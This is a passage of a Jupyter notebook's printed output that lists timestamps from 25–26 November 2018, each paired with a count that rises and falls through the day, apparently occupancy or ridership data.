"['2018-11-25 14:35:09', '14']\n",
"['2018-11-25 14:39:00', '14']\n",
"['2018-11-25 14:39:28', '14']\n",
"['2018-11-25 14:40:29', '16']\n",
"['2018-11-25 14:41:00', '15']\n",
"['2018-11-25 14:41:36', '14']\n",
"['2018-11-25 14:42:01', '15']\n",
"['2018-11-25 14:42:19', '15']\n",
"['2018-11-25 14:43:37', '15']\n",
"['2018-11-25 14:44:19', '15']\n",
"['2018-11-25 14:44:41', '15']\n",
"['2018-11-25 14:45:32', '15']\n",
"['2018-11-25 14:46:00', '16']\n",
"['2018-11-25 14:47:18', '16']\n",
"['2018-11-25 14:48:00', '16']\n",
"['2018-11-25 14:48:19', '18']\n",
"['2018-11-25 14:50:00', '17']\n",
"['2018-11-25 14:50:47', '16']\n",
"['2018-11-25 14:55:00', '14']\n",
"['2018-11-25 14:56:00', '14']\n",
"['2018-11-25 14:57:26', '16']\n",
"['2018-11-25 14:59:00', '16']\n",
"['2018-11-25 15:00:00', '17']\n",
"['2018-11-25 15:02:00', '17']\n",
"['2018-11-25 15:03:00', '0']\n",
"['2018-11-25 15:04:31', '0']\n",
"['2018-11-25 15:05:35', '0']\n",
"['2018-11-25 15:06:11', '0']\n",
"['2018-11-25 15:07:16', '0']\n",
"['2018-11-25 15:08:27', '0']\n",
"['2018-11-25 15:09:00', '0']\n",
"['2018-11-25 15:10:04', '0']\n",
"['2018-11-25 15:10:59', '0']\n",
"['2018-11-25 15:12:00', '0']\n",
"['2018-11-25 15:12:53', '0']\n",
"['2018-11-25 15:13:45', '0']\n",
"['2018-11-25 15:14:30', '0']\n",
"['2018-11-25 15:14:55', '0']\n",
"['2018-11-25 15:16:20', '0']\n",
"['2018-11-25 15:17:16', '0']\n",
"['2018-11-25 15:18:00', '0']\n",
"['2018-11-25 15:19:00', '0']\n",
"['2018-11-25 15:19:15', '0']\n",
"['2018-11-25 15:19:47', '0']\n",
"['2018-11-25 15:20:10', '0']\n",
"['2018-11-25 15:20:46', '0']\n",
"['2018-11-25 15:21:19', '0']\n",
"['2018-11-25 15:22:00', '0']\n",
"['2018-11-25 15:37:00', '1']\n",
"['2018-11-25 15:37:53', '1']\n",
"['2018-11-25 15:38:32', '1']\n",
"['2018-11-25 15:39:19', '1']\n",
"['2018-11-25 15:39:56', '1']\n",
"['2018-11-25 15:40:22', '1']\n",
"['2018-11-25 15:41:00', '19']\n",
"['2018-11-25 15:41:44', '39']\n",
"['2018-11-25 15:44:22', '39']\n",
"['2018-11-25 15:45:00', '41']\n",
"['2018-11-25 15:45:39', '41']\n",
"['2018-11-25 15:46:36', '41']\n",
"['2018-11-25 15:47:00', '40']\n",
"['2018-11-25 15:47:52', '40']\n",
"['2018-11-25 15:48:49', '42']\n",
"['2018-11-25 15:49:33', '42']\n",
"['2018-11-25 15:51:00', '42']\n",
"['2018-11-25 15:52:12', '44']\n",
"['2018-11-25 15:53:11', '44']\n",
"['2018-11-25 15:54:04', '42']\n",
"['2018-11-25 15:54:42', '42']\n",
"['2018-11-25 15:57:00', '29']\n",
"['2018-11-25 15:58:00', '44']\n",
"['2018-11-25 16:00:00', '41']\n",
"['2018-11-25 16:01:00', '42']\n",
"['2018-11-25 16:03:04', '42']\n",
"['2018-11-25 16:04:00', '42']\n",
"['2018-11-25 16:05:00', '37']\n",
"['2018-11-25 16:08:12', '38']\n",
"['2018-11-25 16:09:04', '35']\n",
"['2018-11-25 16:10:00', '35']\n",
"['2018-11-25 16:11:30', '33']\n",
"['2018-11-25 16:12:00', '33']\n",
"['2018-11-25 16:12:46', '32']\n",
"['2018-11-25 16:14:00', '25']\n",
"['2018-11-25 16:14:33', '24']\n",
"['2018-11-25 16:15:08', '18']\n",
"['2018-11-25 16:15:32', '14']\n",
"['2018-11-25 16:16:46', '15']\n",
"['2018-11-25 16:17:23', '13']\n",
"['2018-11-25 16:18:00', '11']\n",
"['2018-11-25 16:18:49', '11']\n",
"['2018-11-25 16:19:41', '11']\n",
"['2018-11-25 16:20:00', '8']\n",
"['2018-11-25 16:24:21', '4']\n",
"['2018-11-25 16:25:00', '0']\n",
"['2018-11-25 16:34:00', '4']\n",
"['2018-11-25 16:35:09', '6']\n",
"['2018-11-25 16:39:00', '6']\n",
"['2018-11-25 16:39:28', '6']\n",
"['2018-11-25 16:40:29', '7']\n",
"['2018-11-25 16:41:00', '7']\n",
"['2018-11-25 16:41:36', '8']\n",
"['2018-11-25 16:42:01', '10']\n",
"['2018-11-25 16:42:19', '30']\n",
"['2018-11-25 16:43:37', '30']\n",
"['2018-11-25 16:44:19', '28']\n",
"['2018-11-25 16:44:41', '28']\n",
"['2018-11-25 16:45:32', '25']\n",
"['2018-11-25 16:46:00', '22']\n",
"['2018-11-25 16:47:18', '20']\n",
"['2018-11-25 16:48:00', '20']\n",
"['2018-11-25 16:48:19', '20']\n",
"['2018-11-25 16:50:00', '20']\n",
"['2018-11-25 16:50:47', '20']\n",
"['2018-11-25 16:55:00', '14']\n",
"['2018-11-25 16:56:00', '16']\n",
"['2018-11-25 16:57:26', '15']\n",
"['2018-11-25 16:59:00', '15']\n",
"['2018-11-25 17:00:00', '16']\n",
"['2018-11-25 17:02:00', '20']\n",
"['2018-11-25 17:03:00', '26']\n",
"['2018-11-25 17:04:31', '25']\n",
"['2018-11-25 17:05:35', '24']\n",
"['2018-11-25 17:06:11', '28']\n",
"['2018-11-25 17:07:16', '27']\n",
"['2018-11-25 17:08:27', '24']\n",
"['2018-11-25 17:09:00', '24']\n",
"['2018-11-25 17:10:04', '26']\n",
"['2018-11-25 17:10:59', '24']\n",
"['2018-11-25 17:12:00', '24']\n",
"['2018-11-25 17:12:53', '24']\n",
"['2018-11-25 17:13:45', '24']\n",
"['2018-11-25 17:14:30', '24']\n",
"['2018-11-25 17:14:55', '24']\n",
"['2018-11-25 17:16:20', '24']\n",
"['2018-11-25 17:17:16', '1']\n",
"['2018-11-25 17:18:00', '1']\n",
"['2018-11-25 17:19:00', '1']\n",
"['2018-11-25 17:19:15', '1']\n",
"['2018-11-25 17:19:47', '1']\n",
"['2018-11-25 17:20:10', '1']\n",
"['2018-11-25 17:20:46', '0']\n",
"['2018-11-25 17:21:19', '0']\n",
"['2018-11-25 17:22:00', '0']\n",
"['2018-11-25 17:37:00', '1']\n",
"['2018-11-25 17:37:53', '1']\n",
"['2018-11-25 17:38:32', '1']\n",
"['2018-11-25 17:39:19', '1']\n",
"['2018-11-25 17:39:56', '1']\n",
"['2018-11-25 17:40:22', '1']\n",
"['2018-11-25 17:41:00', '1']\n",
"['2018-11-25 17:41:44', '17']\n",
"['2018-11-25 17:44:22', '18']\n",
"['2018-11-25 17:45:00', '18']\n",
"['2018-11-25 17:45:39', '20']\n",
"['2018-11-25 17:46:36', '20']\n",
"['2018-11-25 17:47:00', '20']\n",
"['2018-11-25 17:47:52', '23']\n",
"['2018-11-25 17:48:49', '25']\n",
"['2018-11-25 17:49:33', '25']\n",
"['2018-11-25 17:51:00', '25']\n",
"['2018-11-25 17:52:12', '25']\n",
"['2018-11-25 17:53:11', '25']\n",
"['2018-11-25 17:54:04', '25']\n",
"['2018-11-25 17:54:42', '24']\n",
"['2018-11-25 17:57:00', '23']\n",
"['2018-11-25 17:58:00', '23']\n",
"['2018-11-25 18:00:00', '12']\n",
"['2018-11-25 18:01:00', '12']\n",
"['2018-11-25 18:03:04', '12']\n",
"['2018-11-25 18:04:00', '11']\n",
"['2018-11-25 18:05:00', '9']\n",
"['2018-11-25 18:08:12', '8']\n",
"['2018-11-25 18:09:04', '10']\n",
"['2018-11-25 18:10:00', '14']\n",
"['2018-11-25 18:11:30', '14']\n",
"['2018-11-25 18:12:00', '14']\n",
"['2018-11-25 18:12:46', '14']\n",
"['2018-11-25 18:14:00', '11']\n",
"['2018-11-25 18:14:33', '11']\n",
"['2018-11-25 18:15:08', '11']\n",
"['2018-11-25 18:15:32', '11']\n",
"['2018-11-25 18:16:46', '11']\n",
"['2018-11-25 18:17:23', '10']\n",
"['2018-11-25 18:18:00', '6']\n",
"['2018-11-25 18:18:49', '4']\n",
"['2018-11-25 18:19:41', '4']\n",
"['2018-11-25 18:20:00', '4']\n",
"['2018-11-25 18:24:21', '5']\n",
"['2018-11-25 18:25:00', '0']\n",
"['2018-11-25 18:34:00', '5']\n",
"['2018-11-25 18:35:09', '7']\n",
"['2018-11-25 18:39:00', '8']\n",
"['2018-11-25 18:39:28', '8']\n",
"['2018-11-25 18:40:29', '8']\n",
"['2018-11-25 18:41:00', '8']\n",
"['2018-11-25 18:41:36', '9']\n",
"['2018-11-25 18:42:01', '8']\n",
"['2018-11-25 18:42:19', '8']\n",
"['2018-11-25 18:43:37', '10']\n",
"['2018-11-25 18:44:19', '10']\n",
"['2018-11-25 18:44:41', '12']\n",
"['2018-11-25 18:45:32', '12']\n",
"['2018-11-25 18:46:00', '14']\n",
"['2018-11-25 18:47:18', '14']\n",
"['2018-11-25 18:48:00', '13']\n",
"['2018-11-25 18:48:19', '14']\n",
"['2018-11-25 18:50:00', '13']\n",
"['2018-11-25 18:50:47', '11']\n",
"['2018-11-25 18:55:00', '21']\n",
"['2018-11-25 18:56:00', '21']\n",
"['2018-11-25 18:57:26', '21']\n",
"['2018-11-25 18:59:00', '20']\n",
"['2018-11-25 19:00:00', '20']\n",
"['2018-11-25 19:02:00', '21']\n",
"['2018-11-25 19:03:00', '25']\n",
"['2018-11-25 19:04:31', '26']\n",
"['2018-11-25 19:05:35', '25']\n",
"['2018-11-25 19:06:11', '24']\n",
"['2018-11-25 19:07:16', '24']\n",
"['2018-11-25 19:08:27', '22']\n",
"['2018-11-25 19:09:00', '22']\n",
"['2018-11-25 19:10:04', '21']\n",
"['2018-11-25 19:10:59', '21']\n",
"['2018-11-25 19:12:00', '20']\n",
"['2018-11-25 19:12:53', '16']\n",
"['2018-11-25 19:13:45', '16']\n",
"['2018-11-25 19:14:30', '13']\n",
"['2018-11-25 19:14:55', '13']\n",
"['2018-11-25 19:16:20', '13']\n",
"['2018-11-25 19:17:16', '3']\n",
"['2018-11-25 19:18:00', '2']\n",
"['2018-11-25 19:19:00', '1']\n",
"['2018-11-25 19:19:15', '1']\n",
"['2018-11-25 19:19:47', '1']\n",
"['2018-11-25 19:20:10', '1']\n",
"['2018-11-25 19:20:46', '0']\n",
"['2018-11-25 19:21:19', '0']\n",
"['2018-11-25 19:22:00', '0']\n",
"['2018-11-25 19:37:00', '1']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 19:37:53', '1']\n",
"['2018-11-25 19:38:32', '1']\n",
"['2018-11-25 19:39:19', '1']\n",
"['2018-11-25 19:39:56', '1']\n",
"['2018-11-25 19:40:22', '2']\n",
"['2018-11-25 19:41:00', '3']\n",
"['2018-11-25 19:41:44', '25']\n",
"['2018-11-25 19:44:22', '25']\n",
"['2018-11-25 19:45:00', '26']\n",
"['2018-11-25 19:45:39', '26']\n",
"['2018-11-25 19:46:36', '26']\n",
"['2018-11-25 19:47:00', '25']\n",
"['2018-11-25 19:47:52', '25']\n",
"['2018-11-25 19:48:49', '26']\n",
"['2018-11-25 19:49:33', '26']\n",
"['2018-11-25 19:51:00', '23']\n",
"['2018-11-25 19:52:12', '21']\n",
"['2018-11-25 19:53:11', '21']\n",
"['2018-11-25 19:54:04', '21']\n",
"['2018-11-25 19:54:42', '19']\n",
"['2018-11-25 19:57:00', '19']\n",
"['2018-11-25 19:58:00', '25']\n",
"['2018-11-25 20:00:00', '23']\n",
"['2018-11-25 20:01:00', '24']\n",
"['2018-11-25 20:03:04', '23']\n",
"['2018-11-25 20:04:00', '23']\n",
"['2018-11-25 20:05:00', '34']\n",
"['2018-11-25 20:08:12', '34']\n",
"['2018-11-25 20:09:04', '33']\n",
"['2018-11-25 20:10:00', '31']\n",
"['2018-11-25 20:11:30', '31']\n",
"['2018-11-25 20:12:00', '31']\n",
"['2018-11-25 20:12:46', '31']\n",
"['2018-11-25 20:14:00', '27']\n",
"['2018-11-25 20:14:33', '24']\n",
"['2018-11-25 20:15:08', '23']\n",
"['2018-11-25 20:15:32', '22']\n",
"['2018-11-25 20:16:46', '21']\n",
"['2018-11-25 20:17:23', '18']\n",
"['2018-11-25 20:18:00', '18']\n",
"['2018-11-25 20:18:49', '18']\n",
"['2018-11-25 20:19:41', '18']\n",
"['2018-11-25 20:20:00', '11']\n",
"['2018-11-25 20:24:21', '6']\n",
"['2018-11-25 20:25:00', '0']\n",
"['2018-11-25 20:34:00', '1']\n",
"['2018-11-25 20:35:09', '1']\n",
"['2018-11-25 20:39:00', '1']\n",
"['2018-11-25 20:39:28', '1']\n",
"['2018-11-25 20:40:29', '1']\n",
"['2018-11-25 20:41:00', '4']\n",
"['2018-11-25 20:41:36', '5']\n",
"['2018-11-25 20:42:01', '7']\n",
"['2018-11-25 20:42:19', '7']\n",
"['2018-11-25 20:43:37', '8']\n",
"['2018-11-25 20:44:19', '9']\n",
"['2018-11-25 20:44:41', '9']\n",
"['2018-11-25 20:45:32', '9']\n",
"['2018-11-25 20:46:00', '9']\n",
"['2018-11-25 20:47:18', '9']\n",
"['2018-11-25 20:48:00', '9']\n",
"['2018-11-25 20:48:19', '9']\n",
"['2018-11-25 20:50:00', '7']\n",
"['2018-11-25 20:50:47', '7']\n",
"['2018-11-25 20:55:00', '15']\n",
"['2018-11-25 20:56:00', '15']\n",
"['2018-11-25 20:57:26', '15']\n",
"['2018-11-25 20:59:00', '15']\n",
"['2018-11-25 21:00:00', '17']\n",
"['2018-11-25 21:02:00', '16']\n",
"['2018-11-25 21:03:00', '16']\n",
"['2018-11-25 21:04:31', '15']\n",
"['2018-11-25 21:05:35', '12']\n",
"['2018-11-25 21:06:11', '12']\n",
"['2018-11-25 21:07:16', '11']\n",
"['2018-11-25 21:08:27', '11']\n",
"['2018-11-25 21:09:00', '11']\n",
"['2018-11-25 21:10:04', '11']\n",
"['2018-11-25 21:10:59', '11']\n",
"['2018-11-25 21:12:00', '10']\n",
"['2018-11-25 21:12:53', '10']\n",
"['2018-11-25 21:13:45', '10']\n",
"['2018-11-25 21:14:30', '9']\n",
"['2018-11-25 21:14:55', '9']\n",
"['2018-11-25 21:16:20', '9']\n",
"['2018-11-25 21:17:16', '4']\n",
"['2018-11-25 21:18:00', '4']\n",
"['2018-11-25 21:19:00', '4']\n",
"['2018-11-25 21:19:15', '4']\n",
"['2018-11-25 21:19:47', '4']\n",
"['2018-11-25 21:20:10', '4']\n",
"['2018-11-25 21:20:46', '4']\n",
"['2018-11-25 21:21:19', '4']\n",
"['2018-11-25 21:22:00', '0']\n",
"['2018-11-26 06:11:04', '4']\n",
"['2018-11-26 06:11:39', '4']\n",
"['2018-11-26 06:14:49', '4']\n",
"['2018-11-26 06:15:03', '4']\n",
"['2018-11-26 06:15:42', '5']\n",
"['2018-11-26 06:16:36', '6']\n",
"['2018-11-26 06:17:26', '6']\n",
"['2018-11-26 06:17:44', '8']\n",
"['2018-11-26 06:17:51', '8']\n",
"['2018-11-26 06:19:00', '8']\n",
"['2018-11-26 06:19:32', '8']\n",
"['2018-11-26 06:19:54', '8']\n",
"['2018-11-26 06:20:34', '10']\n",
"['2018-11-26 06:21:20', '11']\n",
"['2018-11-26 06:22:48', '11']\n",
"['2018-11-26 06:23:22', '11']\n",
"['2018-11-26 06:23:33', '11']\n",
"['2018-11-26 06:24:49', '11']\n",
"['2018-11-26 06:25:11', '9']\n",
"['2018-11-26 06:27:47', '6']\n",
"['2018-11-26 06:29:17', '6']\n",
"['2018-11-26 06:29:54', '6']\n",
"['2018-11-26 06:30:32', '6']\n",
"['2018-11-26 06:30:46', '5']\n",
"['2018-11-26 06:32:25', '5']\n",
"['2018-11-26 06:33:58', '5']\n",
"['2018-11-26 06:34:39', '5']\n",
"['2018-11-26 06:35:04', '5']\n",
"['2018-11-26 06:35:19', '5']\n",
"['2018-11-26 06:37:17', '5']\n",
"['2018-11-26 06:37:47', '5']\n",
"['2018-11-26 06:38:03', '5']\n",
"['2018-11-26 06:38:37', '5']\n",
"['2018-11-26 06:39:00', '5']\n",
"['2018-11-26 06:39:30', '5']\n",
"['2018-11-26 06:40:06', '5']\n",
"['2018-11-26 06:40:46', '5']\n",
"['2018-11-26 06:41:15', '5']\n",
"['2018-11-26 06:41:28', '5']\n",
"['2018-11-26 06:42:50', '5']\n",
"['2018-11-26 06:43:28', '3']\n",
"['2018-11-26 06:44:16', '3']\n",
"['2018-11-26 06:44:37', '2']\n",
"['2018-11-26 06:45:31', '2']\n",
"['2018-11-26 06:46:06', '2']\n",
"['2018-11-26 06:46:23', '2']\n",
"['2018-11-26 06:46:51', '2']\n",
"['2018-11-26 06:47:15', '2']\n",
"['2018-11-26 06:47:37', '0']\n",
"['2018-11-26 06:48:54', '0']\n",
"['2018-11-26 06:49:33', '0']\n",
"['2018-11-26 06:50:03', '0']\n",
"['2018-11-26 06:50:38', '0']\n",
"['2018-11-26 06:51:07', '0']\n",
"['2018-11-26 06:51:28', '0']\n",
"['2018-11-26 06:52:00', '0']\n",
"['2018-11-26 06:52:20', '1']\n",
"['2018-11-26 06:54:51', '1']\n",
"['2018-11-26 06:55:19', '1']\n",
"['2018-11-26 06:55:46', '1']\n",
"['2018-11-26 06:56:24', '2']\n",
"['2018-11-26 06:57:07', '2']\n",
"['2018-11-26 06:57:24', '4']\n",
"['2018-11-26 06:58:26', '4']\n",
"['2018-11-26 06:58:47', '4']\n",
"['2018-11-26 06:59:51', '6']\n",
"['2018-11-26 07:04:12', '6']\n",
"['2018-11-26 07:04:36', '7']\n",
"['2018-11-26 07:04:47', '7']\n",
"['2018-11-26 07:05:20', '6']\n",
"['2018-11-26 07:07:08', '6']\n",
"['2018-11-26 07:07:50', '6']\n",
"['2018-11-26 07:09:02', '6']\n",
"['2018-11-26 07:09:14', '6']\n",
"['2018-11-26 07:10:18', '6']\n",
"['2018-11-26 07:10:29', '7']\n",
"['2018-11-26 07:12:50', '3']\n",
"['2018-11-26 07:15:42', '3']\n",
"['2018-11-26 07:15:59', '3']\n",
"['2018-11-26 07:16:13', '4']\n",
"['2018-11-26 07:17:50', '4']\n",
"['2018-11-26 07:18:06', '4']\n",
"['2018-11-26 07:18:39', '4']\n",
"['2018-11-26 07:19:34', '3']\n",
"['2018-11-26 07:20:24', '2']\n",
"['2018-11-26 07:21:25', '2']\n",
"['2018-11-26 07:21:43', '2']\n",
"['2018-11-26 07:22:42', '2']\n",
"['2018-11-26 07:23:16', '2']\n",
"['2018-11-26 07:23:49', '2']\n",
"['2018-11-26 07:24:42', '2']\n",
"['2018-11-26 07:25:18', '2']\n",
"['2018-11-26 07:25:30', '1']\n",
"['2018-11-26 07:29:59', '0']\n",
"['2018-11-26 07:31:25', '0']\n",
"['2018-11-26 07:41:02', '15']\n",
"['2018-11-26 07:41:41', '21']\n",
"['2018-11-26 07:45:20', '25']\n",
"['2018-11-26 07:46:15', '25']\n",
"['2018-11-26 07:47:12', '25']\n",
"['2018-11-26 07:47:34', '25']\n",
"['2018-11-26 07:47:56', '29']\n",
"['2018-11-26 07:48:34', '30']\n",
"['2018-11-26 07:49:07', '31']\n",
"['2018-11-26 07:50:17', '31']\n",
"['2018-11-26 07:50:38', '32']\n",
"['2018-11-26 07:51:27', '35']\n",
"['2018-11-26 07:52:39', '35']\n",
"['2018-11-26 07:52:57', '35']\n",
"['2018-11-26 07:54:28', '35']\n",
"['2018-11-26 07:54:57', '35']\n",
"['2018-11-26 07:55:39', '35']\n",
"['2018-11-26 07:56:56', '37']\n",
"['2018-11-26 07:57:46', '37']\n",
"['2018-11-26 08:00:54', '34']\n",
"['2018-11-26 08:03:25', '37']\n",
"['2018-11-26 08:04:26', '34']\n",
"['2018-11-26 08:06:24', '34']\n",
"['2018-11-26 08:06:43', '26']\n",
"['2018-11-26 08:08:37', '18']\n",
"['2018-11-26 08:10:51', '24']\n",
"['2018-11-26 08:13:04', '26']\n",
"['2018-11-26 08:13:29', '26']\n",
"['2018-11-26 08:13:43', '26']\n",
"['2018-11-26 08:16:15', '26']\n",
"['2018-11-26 08:16:46', '26']\n",
"['2018-11-26 08:16:58', '26']\n",
"['2018-11-26 08:17:35', '8']\n",
"['2018-11-26 08:18:26', '7']\n",
"['2018-11-26 08:19:15', '7']\n",
"['2018-11-26 08:19:49', '7']\n",
"['2018-11-26 08:20:32', '7']\n",
"['2018-11-26 08:21:01', '7']\n",
"['2018-11-26 08:21:14', '7']\n",
"['2018-11-26 08:22:36', '7']\n",
"['2018-11-26 08:23:29', '7']\n",
"['2018-11-26 08:23:57', '7']\n",
"['2018-11-26 08:24:18', '6']\n",
"['2018-11-26 08:25:02', '6']\n",
"['2018-11-26 08:25:35', '4']\n",
"['2018-11-26 08:26:27', '4']\n",
"['2018-11-26 08:26:56', '4']\n",
"['2018-11-26 08:27:22', '4']\n",
"['2018-11-26 08:27:45', '0']\n",
"['2018-11-26 08:31:15', '2']\n",
"['2018-11-26 08:31:51', '2']\n",
"['2018-11-26 08:32:59', '3']\n",
"['2018-11-26 08:33:48', '5']\n",
"['2018-11-26 08:34:36', '6']\n",
"['2018-11-26 08:35:21', '6']\n",
"['2018-11-26 08:35:46', '9']\n",
"['2018-11-26 08:36:49', '17']\n",
"['2018-11-26 08:38:55', '23']\n",
"['2018-11-26 08:41:33', '30']\n",
"['2018-11-26 08:42:17', '31']\n",
"['2018-11-26 08:43:01', '33']\n",
"['2018-11-26 08:44:07', '34']\n",
"['2018-11-26 08:44:45', '34']\n",
"['2018-11-26 08:45:01', '35']\n",
"['2018-11-26 08:45:46', '36']\n",
"['2018-11-26 08:46:32', '36']\n",
"['2018-11-26 08:47:58', '40']\n",
"['2018-11-26 08:48:56', '43']\n",
"['2018-11-26 08:50:02', '53']\n",
"['2018-11-26 08:51:16', '53']\n",
"['2018-11-26 08:51:30', '57']\n",
"['2018-11-26 08:55:01', '52']\n",
"['2018-11-26 08:55:40', '38']\n",
"['2018-11-26 08:57:54', '26']\n",
"['2018-11-26 08:58:57', '25']\n",
"['2018-11-26 09:02:12', '29']\n",
"['2018-11-26 09:04:19', '29']\n",
"['2018-11-26 09:05:38', '21']\n",
"['2018-11-26 09:08:24', '22']\n",
"['2018-11-26 09:09:09', '22']\n",
"['2018-11-26 09:09:56', '26']\n",
"['2018-11-26 09:13:16', '26']\n",
"['2018-11-26 09:14:04', '11']\n",
"['2018-11-26 09:15:07', '11']\n",
"['2018-11-26 09:16:08', '7']\n",
"['2018-11-26 09:17:05', '4']\n",
"['2018-11-26 09:18:11', '4']\n",
"['2018-11-26 09:18:29', '4']\n",
"['2018-11-26 09:19:23', '4']\n",
"['2018-11-26 09:20:00', '4']\n",
"['2018-11-26 09:20:30', '0']\n",
"['2018-11-26 09:21:59', '0']\n",
"['2018-11-26 09:22:33', '0']\n",
"['2018-11-26 09:23:05', '0']\n",
"['2018-11-26 09:24:53', '0']\n",
"['2018-11-26 09:25:27', '0']\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 09:26:01', '0']\n",
"['2018-11-26 09:26:21', '0']\n",
"['2018-11-26 09:32:22', '0']\n",
"['2018-11-26 09:33:04', '0']\n",
"['2018-11-26 09:33:34', '0']\n",
"['2018-11-26 09:34:27', '4']\n",
"['2018-11-26 09:35:21', '4']\n",
"['2018-11-26 09:35:58', '6']\n",
"['2018-11-26 09:37:15', '6']\n",
"['2018-11-26 09:37:54', '8']\n",
"['2018-11-26 09:38:40', '11']\n",
"['2018-11-26 09:39:28', '11']\n",
"['2018-11-26 09:39:35', '12']\n",
"['2018-11-26 09:40:45', '12']\n",
"['2018-11-26 09:41:06', '13']\n",
"['2018-11-26 09:41:56', '13']\n",
"['2018-11-26 09:42:38', '13']\n",
"['2018-11-26 09:43:45', '19']\n",
"['2018-11-26 09:45:13', '19']\n",
"['2018-11-26 09:45:45', '19']\n",
"['2018-11-26 09:45:51', '18']\n",
"['2018-11-26 09:47:23', '20']\n",
"['2018-11-26 09:47:58', '15']\n",
"['2018-11-26 09:55:00', '17']\n",
"['2018-11-26 09:57:52', '18']\n",
"['2018-11-26 09:59:43', '14']\n",
"['2018-11-26 10:01:35', '11']\n",
"['2018-11-26 10:03:29', '2']\n",
"['2018-11-26 10:05:49', '3']\n",
"['2018-11-26 10:07:15', '3']\n",
"['2018-11-26 10:08:42', '3']\n",
"['2018-11-26 10:09:07', '3']\n",
"['2018-11-26 10:09:42', '3']\n",
"['2018-11-26 10:14:11', '2']\n",
"['2018-11-26 10:15:36', '2']\n",
"['2018-11-26 10:16:10', '2']\n",
"['2018-11-26 10:16:44', '2']\n",
"['2018-11-26 10:16:59', '3']\n",
"['2018-11-26 10:17:40', '3']\n",
"['2018-11-26 10:18:15', '3']\n",
"['2018-11-26 10:18:54', '3']\n",
"['2018-11-26 10:19:16', '3']\n",
"['2018-11-26 10:19:26', '3']\n",
"['2018-11-26 10:20:47', '3']\n",
"['2018-11-26 10:22:20', '0']\n",
"['2018-11-26 10:23:10', '0']\n",
"['2018-11-26 10:26:40', '0']\n",
"['2018-11-26 10:30:11', '0']\n",
"['2018-11-26 10:33:42', '0']\n",
"['2018-11-26 10:37:13', '0']\n",
"['2018-11-26 10:40:44', '0']\n",
"['2018-11-26 10:41:04', '1']\n",
"['2018-11-26 10:43:24', '4']\n",
"['2018-11-26 10:45:58', '4']\n",
"['2018-11-26 10:46:51', '5']\n",
"['2018-11-26 10:47:05', '6']\n",
"['2018-11-26 10:48:14', '6']\n",
"['2018-11-26 10:48:28', '6']\n",
"['2018-11-26 10:48:48', '9']\n",
"['2018-11-26 10:49:42', '9']\n",
"['2018-11-26 10:49:51', '13']\n",
"['2018-11-26 10:51:54', '13']\n",
"['2018-11-26 10:53:07', '13']\n",
"['2018-11-26 10:54:01', '13']\n",
"['2018-11-26 10:54:46', '13']\n",
"['2018-11-26 10:54:56', '11']\n",
"['2018-11-26 10:58:37', '10']\n",
"['2018-11-26 11:00:09', '12']\n",
"['2018-11-26 11:02:25', '9']\n",
"['2018-11-26 11:03:19', '9']\n",
"['2018-11-26 11:05:21', '9']\n",
"['2018-11-26 11:06:35', '9']\n",
"['2018-11-26 11:09:19', '12']\n",
"['2018-11-26 11:12:27', '13']\n",
"['2018-11-26 11:12:50', '13']\n",
"['2018-11-26 11:13:19', '13']\n",
"['2018-11-26 11:16:41', '13']\n",
"['2018-11-26 11:16:57', '13']\n",
"['2018-11-26 11:17:30', '13']\n",
"['2018-11-26 11:18:34', '11']\n",
"['2018-11-26 11:19:36', '9']\n",
"['2018-11-26 11:20:28', '8']\n",
"['2018-11-26 11:21:13', '7']\n",
"['2018-11-26 11:22:28', '7']\n",
"['2018-11-26 11:23:37', '6']\n",
"['2018-11-26 11:24:36', '2']\n",
"['2018-11-26 11:25:45', '1']\n",
"['2018-11-26 11:26:55', '0']\n",
"['2018-11-26 11:29:07', '0']\n",
"['2018-11-26 11:29:42', '0']\n",
"['2018-11-26 11:30:19', '0']\n",
"['2018-11-26 11:30:53', '0']\n",
"['2018-11-26 11:31:11', '0']\n",
"['2018-11-26 11:37:50', '0']\n",
"['2018-11-26 11:38:28', '1']\n",
"['2018-11-26 11:39:22', '4']\n",
"['2018-11-26 11:40:32', '4']\n",
"['2018-11-26 11:42:31', '5']\n",
"['2018-11-26 11:43:28', '6']\n",
"['2018-11-26 11:44:30', '9']\n",
"['2018-11-26 11:45:34', '12']\n",
"['2018-11-26 11:46:34', '13']\n",
"['2018-11-26 11:47:15', '14']\n",
"['2018-11-26 11:48:45', '17']\n",
"['2018-11-26 11:50:14', '17']\n",
"['2018-11-26 11:50:47', '19']\n",
"['2018-11-26 11:51:41', '21']\n",
"['2018-11-26 11:52:42', '23']\n",
"['2018-11-26 11:53:43', '25']\n",
"['2018-11-26 11:55:15', '25']\n",
"['2018-11-26 11:56:08', '26']\n",
"['2018-11-26 11:56:41', '27']\n",
"['2018-11-26 11:58:25', '26']\n",
"['2018-11-26 11:59:08', '26']\n",
"['2018-11-26 12:03:17', '24']\n",
"['2018-11-26 12:04:50', '22']\n",
"['2018-11-26 12:06:41', '19']\n",
"['2018-11-26 12:07:50', '19']\n",
"['2018-11-26 12:09:49', '18']\n",
"['2018-11-26 12:13:43', '28']\n",
"['2018-11-26 12:15:25', '29']\n",
"['2018-11-26 12:18:11', '29']\n",
"['2018-11-26 12:19:04', '27']\n",
"['2018-11-26 12:19:14', '30']\n",
"['2018-11-26 12:20:31', '30']\n",
"['2018-11-26 12:22:13', '29']\n",
"['2018-11-26 12:22:49', '28']\n",
"['2018-11-26 12:23:43', '25']\n",
"['2018-11-26 12:24:30', '25']\n",
"['2018-11-26 12:25:19', '24']\n",
"['2018-11-26 12:26:17', '19']\n",
"['2018-11-26 12:27:32', '17']\n",
"['2018-11-26 12:28:31', '12']\n",
"['2018-11-26 12:28:47', '11']\n",
"['2018-11-26 12:30:39', '8']\n",
"['2018-11-26 12:33:32', '4']\n",
"['2018-11-26 12:34:31', '3']\n",
"['2018-11-26 12:35:19', '1']\n",
"['2018-11-26 12:36:07', '1']\n",
"['2018-11-26 12:36:55', '1']\n",
"['2018-11-26 12:37:43', '0']\n",
"['2018-11-26 12:38:31', '6']\n",
"['2018-11-26 12:39:05', '6']\n",
"['2018-11-26 12:41:32', '6']\n",
"['2018-11-26 12:44:13', '5']\n",
"['2018-11-26 12:44:54', '6']\n",
"['2018-11-26 12:45:46', '6']\n",
"['2018-11-26 12:47:16', '6']\n",
"['2018-11-26 12:47:26', '6']\n",
"['2018-11-26 12:48:12', '6']\n",
"['2018-11-26 12:48:36', '6']\n",
"['2018-11-26 12:48:46', '8']\n",
"['2018-11-26 12:50:51', '9']\n",
"['2018-11-26 12:51:55', '11']\n",
"['2018-11-26 12:53:12', '12']\n",
